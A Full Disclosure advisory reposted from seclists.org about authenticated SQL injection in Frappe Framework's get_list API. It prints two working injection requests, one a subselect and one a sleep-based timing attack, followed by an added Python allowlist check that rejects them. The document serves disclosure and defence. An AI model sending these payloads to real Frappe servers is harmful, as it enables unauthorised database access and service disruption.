Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework
The `frappe.desk.reportview.get_list` API of the Frappe Framework has a SQL injection vulnerability affecting version v15.56.1. Because the `fields[]` parameter is not properly sanitized, a low-privileged user can inject arbitrary SQL expressions into the SELECT clause. The examples show an attacker retrieving database information or performing a time-delay attack. 2025-5-28 03:19:56 Author: seclists.org (view original)


Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Tue, 27 May 2025 17:04:14 -0400


An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework,
affecting version v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows
low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.

Sample SQL injection:

Request:

GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934 HTTP/2
Host: --host--
Cookie: ******
--snip--

Response:

HTTP/2 200 OK

{"message":[{"salary_component_abbr":"H***","current_db":"_**************"},
--snip--

Time-based attack:

Request:

GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933 HTTP/2
Host: --host--
Cookie: ******
--snip--
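The root cause described above is that the fields[] value is passed through to the SELECT clause without being restricted to column references. Below is an added example (my own code, not Frappe's, and not part of the original post) of the kind of server-side allowlist check that closes this class of bug: it parses the JSON-encoded fields parameter and refuses anything that is not a plain column, a `table`.`column` pair, or one of those followed by "as alias". The identifier grammar is an assumption chosen to be deliberately narrow; a real deployment would additionally compare each column against the DocType's known columns. The two request targets quoted in the advisory are fed through the check alongside a constructed benign request.

```python
"""Added example, not Frappe's own code: a strict allowlist for the ``fields``
parameter of a get_list-style endpoint, applied to the request targets quoted
in the advisory. The accepted grammar is an assumption: bare column,
`table`.`column`, optionally followed by "as alias". Aggregates and any other
SQL expression are refused before the value can reach a query builder."""

import json
import re
from urllib.parse import parse_qs, urlsplit

# Identifier: bare word, or backtick-quoted (Frappe table names such as
# `tabSalary Component` contain spaces). Assumed grammar, deliberately narrow.
IDENT = r"(?:`[A-Za-z0-9_ ]+`|[A-Za-z_][A-Za-z0-9_]*)"
SAFE_FIELD = re.compile(
    rf"^\s*(?:{IDENT}\.)?{IDENT}(?:\s+as\s+{IDENT})?\s*$", re.IGNORECASE
)


def validate_fields(raw_fields):
    """Validate the JSON-encoded ``fields`` value exactly as the client sent it.

    Returns (True, list_of_fields) or (False, reason). Anything that is not a
    JSON list of strings, or any entry that is not a plain column reference,
    fails the whole request: one bad entry is enough to reject it.
    """
    try:
        fields = json.loads(raw_fields)
    except (TypeError, ValueError):
        return False, "fields is not valid JSON"
    if not isinstance(fields, list) or not all(isinstance(f, str) for f in fields):
        return False, "fields must be a JSON list of strings"
    for f in fields:
        if not SAFE_FIELD.match(f):
            return False, f"rejected field expression: {f!r}"
    return True, fields


def check_request_target(target):
    """Pull ``fields`` out of a request target (path?query) and validate it."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    raw = query.get("fields")
    if not raw:
        return True, "no fields parameter"
    return validate_fields(raw[0])


# Request targets quoted in the advisory, URL-encoded exactly as posted.
ADVISORY_SUBSELECT_REQUEST = (
    "/api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr"
    "%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component"
    "&limit=20&_=1748066407934"
)
ADVISORY_SLEEP_REQUEST = (
    "/api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr"
    "%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component"
    "&limit=20&_=1748066407933"
)
# A constructed benign request for comparison (not from the advisory).
BENIGN_REQUEST = (
    "/api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr"
    "%22%2C%22name%22%5D&doctype=Salary%20Component&limit=20"
)

if __name__ == "__main__":
    for label, target in [
        ("advisory (subselect)", ADVISORY_SUBSELECT_REQUEST),
        ("advisory (sleep)", ADVISORY_SLEEP_REQUEST),
        ("benign", BENIGN_REQUEST),
    ]:
        ok, detail = check_request_target(target)
        print(f"{label}: {'accepted' if ok else 'REJECTED'} -> {detail}")
```

Both advisory payloads are rejected at the first entry, because the injected string contains a comma and parentheses that the column grammar never admits; the check runs on the decoded parameter, so the mixed encoding of the second request (literal brackets, percent-encoded quotes) makes no difference. The same function is a usable detection rule when run over request logs: any get_list call whose fields value fails validation is worth an alert.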


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Source: https://seclists.org/fulldisclosure/2025/May/22